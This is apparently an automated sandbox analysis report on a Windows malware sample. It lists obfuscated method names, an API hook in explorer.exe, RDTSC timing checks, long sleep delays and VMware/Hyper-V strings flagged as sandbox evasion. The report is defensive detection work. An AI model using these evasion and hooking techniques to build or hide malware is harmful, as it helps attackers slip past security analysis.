          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, cmgPmXiboSYoa3QGE3.csHigh entropy of concatenated method names: 'UCQ2y34smJ', 'Yhj29b14Sd', 'ToString', 'CBQ2EynDMb', 'hE72cG2WxE', 'tIL2DpLTIk', 'dEt2UtUNRU', 'WYd2AxRco5', 'y5720UArOP', 'eQ82Cwnkub'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, oB0xVLocckiv83UpuH.csHigh entropy of concatenated method names: 'CTR7fDQEE', 'cXjvFG64p', 'r3T5NNl6U', 'FrlXNyFyI', 'AdtGANQpv', 'avXjL9b2d', 'JPY2G0idXymPGfM4vj', 'mWqvXmdIEi8V2dh7bG', 'ayrqA3Ogk', 'lWhstmZLZ'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.csHigh entropy of concatenated method names: 'sRfTMUmVL3', 'ixJTEJ7nXL', 'bfjTc1kpTu', 'EFpTD63677', 'MH4TUdTXYv', 'lVlTABwUPd', 'n0FT0gKKlR', 'rvXTCjiSqr', 'djvTBrhTim', 'vQtTyQQblU'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, ltcgCVYv76lXvX3msa.csHigh entropy of concatenated method names: 'bs68SXGHtY', 'RSN81gANUJ', 'Rq58YacgSL', 'r1H8rLEuJA', 'oVM8PlkpCO', 'IsU8Wlar0u', 'n948Kd9Bci', 'CAQ8NiTQtl', 'r1A8fTL6a8', 'Nc68kch5ZS'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, YAaSGg4bolrwdOLiIty.csHigh entropy of concatenated method names: 'MfOlJJrn23', 'z6plOG8D9c', 'Gi1l7o9mhR', 'KNwlvaHkem', 'ufdlZ1A9fY', 'otvl5SxWEh', 'cFElXX9Hgl', 'PdFlmXa4CV', 'mDJlGW9atx', 'lYvljX6EpK'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, pOGZgMPdijhgp0Qug4.csHigh entropy of concatenated method names: 'daw9psHpsdJBefiKi20', 'hL0QGYHRvWb5vxIAOtS', 'kMO8OdHkX6Xrxuogwgc', 'NnaAqegFfw', 'jPcAlHYGNF', 'ADyAsc3uFb', 'BGVh6oHxpru2rgqK30a', 'BSh1pXHh8988wTlq6F4'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, bOaEQFmmVIlgCiiuqu.csHigh entropy of concatenated method names: 'IuycY1MG3X', 'tbEcrhbbvv', 'ybJc6kroWi', 'F6MciEXqHG', 'tJrcetiQhq', 'MNtcpq3DA4', 'z3JcgurX2c', 'YxMcHLyPux', 'XiqcnYAxSD', 'jUpcttA2Cg'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, gPrrU3HtCULuoHh1JV.csHigh entropy of concatenated method names: 'mIWqEAQsCA', 'ojKqcvbxEk', 'o0EqDA6Rvi', 'D8iqUSmvEl', 'IJDqA7kfEd', 'coBq00xpHo', 'GtHqCatAjw', 'UgnqBtGUTr', 'YWrqySl98V', 'aRMq9y9oxc'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, hqxnSitWhtR7q3gqrG.csHigh entropy of concatenated method names: 'kOxl4PCYLN', 'O7UlTQ7W2g', 'jgWlauGVA8', 'xu8lE1AEXR', 'NSAlct2RWc', 'iTBlU2gG2t', 'hjolAIrGX8', 'NThqgd9Zbm', 'WyVqHnrRE2', 'uMvqn2etNZ'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, jCtKcma5lJ3MbRTstQ.csHigh entropy of concatenated method names: 'sG440OaEQF', 'DVI4ClgCii', 'Yot4yER9YW', 'QDo498S8a5', 'Pg348sv2Oj', 'i3f4dTR4cV', 'x68oeVsUH22s8bVPk7', 'jaZgWPzpJlJRobALnv', 'eKm44KXJuj', 'qT84TB2ein'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, l9qq04cS9Hl0VvYakt.csHigh entropy of concatenated method names: 'Dispose', 'pld4n1aPXB', 'HyloPwMHCv', 'wK6bb8WK0P', 'qDP4trrU3t', 'kUL4zuoHh1', 'ProcessDialogKey', 'xVCobUNuic', 'rTTo4dINRL', 'mijooDqxnS'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, WiO20JhyCPsOCNBRkV.csHigh entropy of concatenated method names: 'GD50J7UIKW', 'Ofh0OLiZeg', 'tB107x3sY1', 'pHa0vU12cP', 'msU0ZoP1Bp', 'LUo05G15JV', 'NR50X8Sgfv', 'GIJ0mN75M4', 'XL10Gtj8eJ', 'kFs0jVWOrx'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, qOjU3fRTR4cV4XrMI9.csHigh entropy of concatenated method names: 'IhwAMylxSP', 'vWXAcYF1fb', 'DfJAUhXcWS', 'gXIA0Nl4GH', 'YZNACuLEeS', 'O8PUe15vxo', 'XB9UpfgpZs', 'nEiUgDANC4', 'JEcUHDjJ4B', 'f3IUnBxNbL'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, QOOq4WzxZ7R5oj4SxF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XTPlxYwhix', 'N60l8dqM86', 'vPGldTbsq5', 'acZl2AjsSa', 'SBAlqyQgYX', 'lwkllV100d', 'LO8lsqcnKJ'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, N8a5lLjmKXGyH1g3sv.csHigh entropy of concatenated method names: 'I1YUZVPZRp', 'GNIUXpcdSt', 'xojDWYyrlR', 'hnoDKOOeX1', 'YwIDNGZvWX', 'kvNDfOWAlH', 'dupDkHETe8', 'DtpDImv7si', 'Tn3DhyWPyK', 'Y5sDSD6AwU'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, t1gTjSu8i7T8M24dPW.csHigh entropy of concatenated method names: 'wjXxm23XpI', 'kadxGMcssy', 'AcWxR7WSlr', 'OaExPkp5Bq', 'TvLxKGnakG', 'yf0xNmwh2o', 'CHXxkkF5UR', 'hhKxIG8CPS', 'NdtxSo8LMI', 'VW1xLcuo5R'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, faPLJtGotER9YWYDo8.csHigh entropy of concatenated method names: 'aDNDvJKnMt', 'NNnD5B2Qua', 'WTZDmlbI9a', 'OFSDGicBM5', 'UtgD8TbEQG', 'wVuDdZ8BaK', 'CwoD2I0TiA', 'JTHDqsCoWC', 'DDXDlFbRsU', 'NonDsWd9mN'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, UyT6Qk4TMd1QQYD6Roi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NYBsYvnOSt', 'wJGsrJnUvW', 'awWs67rIZ4', 'ovOsiTIqBN', 'D7TseSOt6J', 'hW6sp0laCd', 'CRCsgNrZl8'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, ixViYDp6OhBnxDhwOt.csHigh entropy of concatenated method names: 'CcW2H0QoSi', 'rZn2tijack', 'T4wqbYaDE6', 't8Hq4Z0fnj', 'TeL2Lj7Sfw', 'Cn421GifV1', 'I6Z2uf5WAH', 'VJx2YeleE1', 'lpv2rT7LrV', 'uAp26nnCta'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: UgHXEfw1uL.exe PID: 2668, type: MEMORYSTR
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002A79904 second address: 0000000002A7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002A79B7E second address: 0000000002A79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13901
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -11068046444225724s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239328s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239219s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -239000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -238890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -238781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -238672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -238562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -238453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -238343s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 4028Thread sleep time: -238234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe TID: 1396Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6352Thread sleep count: 9506 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6352Thread sleep time: -19012000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6352Thread sleep count: 447 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6352Thread sleep time: -894000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 5800Thread sleep count: 7777 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 5800Thread sleep time: -15554000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 5800Thread sleep count: 2190 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 5800Thread sleep time: -4380000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239875Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239765Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239656Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239547Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239437Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239328Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239219Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239109Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239000Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238890Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238781Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238672Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238562Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238453Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238343Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238234Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeWindow / User API: threadDelayed 790Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeWindow / User API: threadDelayed 2343Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9506Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 447Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 862Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 7777Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 2190Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\control.exeAPI coverage: 2.3 %
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239875Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239765Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239656Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239547Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239437Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239328Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239219Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239109Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 239000Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238890Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238781Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238672Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238562Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238453Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238343Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 238234Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000003.3841659566.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000004.00000000.2078672674.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATAa
          Source: explorer.exe, 00000004.00000000.2078672674.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4540698292.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.2075184468.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000003.3841659566.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: control.exe, 00000005.00000002.4532013045.0000000003125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2!
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.0000000003125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000002.4532933943.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: control.exe, 00000005.00000002.4532013045.00000000030E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
          Source: explorer.exe, 00000004.00000000.2075184468.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.4537110885.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
